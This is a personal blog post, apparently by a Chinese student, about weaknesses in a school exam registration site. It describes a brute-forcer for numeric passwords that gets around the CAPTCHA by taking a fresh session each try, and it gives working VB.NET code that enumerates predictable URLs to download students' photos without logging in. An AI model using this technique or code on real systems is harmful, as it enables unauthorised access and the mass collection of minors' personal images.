关于某网站

需要上这个网站, 顺便吐糟一下。

这个网站将动态网页的扩展名改成了 .a(abcdefgh.a) 但是我从HTTP头

HTTP/1.1 200 OK
...
X-Powered-By: Servlet/2.5 JSP/2.1

发现是用JSP编写的。

由于号和默认的密码都是数字, 且密码是8位, 而且改密码的时候只能修改为包含字母或数字的密码, 所以比较不安全。

于是我写了一个破解密码的机器, 用了一天时间, 还没破解成功。

它的验证码是当你输入几次错误的用户名和密码才出现的, 但是我写的破解机每次得到一个新的Session号, 就相当于每次第一次登陆, 可以无视验证码。

由于效率低下, 源代码不予公开。

另外, 我学会了使用正则表达式。
【Update!2012.2.18】
经测试, 这东西只是作为技术研究, 我用这东西破解我的报名号+1的号, 一天都没成功呃..

【Update!2012.2.19】

可以不用登陆而通过地址获取到照片。

如:
http://__.__.__.__:/00/0000/0000000班级号学生号.JPG

写程序一个用于获取照片:

Imports System.IO
Imports System.Net

Module Module1

    Sub Main()
        Using wc As New WebClient
            Dim Save = "N:\Ps\"
            For i = 1 To 20
                For j = 1 To 99
                    Try
                        Dim cls
                        cls = i.ToString
                        cls = StrDup(2 - cls.Length, "0") & cls
                        Dim no
                        no = j.ToString
                        no = StrDup(2 - no.Length, "0") & no
                        Console.Write(cls & " " & no & "...")
                        If Not Directory.Exists(Path.Combine(Save, cls)) Then
                            Directory.CreateDirectory(Path.Combine(Save, cls))
                        End If
                        Dim fn = Path.Combine(Path.Combine(Save, cls), "00000000" & cls & no & ".JPG")
                        wc.DownloadFile("http://__.__.__.__:/00/0000/0000000" & cls & no & ".JPG", fn)
                        Console.WriteLine("ok")
                    Catch ex As Exception
                        Console.WriteLine(ex.ToString)
                    End Try
                Next
            Next
        End Using
        Console.ReadKey()
    End Sub

End Module

经过获取统计, 有725人参加中考。
我以为我们年级有16个班但是发现有17个班。

发表评论?

6 条评论。

  1. 其实还有照片,是根据你的学校代码以及班号学号弄得。。可以查看任何人的照片- -#

  2. Orz…

    前天看了英国小学生把学校网站入侵了,今天就看到中国初中生把教育局网站破解了!!!

发表评论

注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

:wink: :twisted: :roll: :oops: :mrgreen: :lol: :idea: :evil: :cry: :arrow: :?: :-| :-x :-o :-P :-D :-? :) :( :!: 8-O 8)

本文链接:https://twd2.me/archives/1727QrCode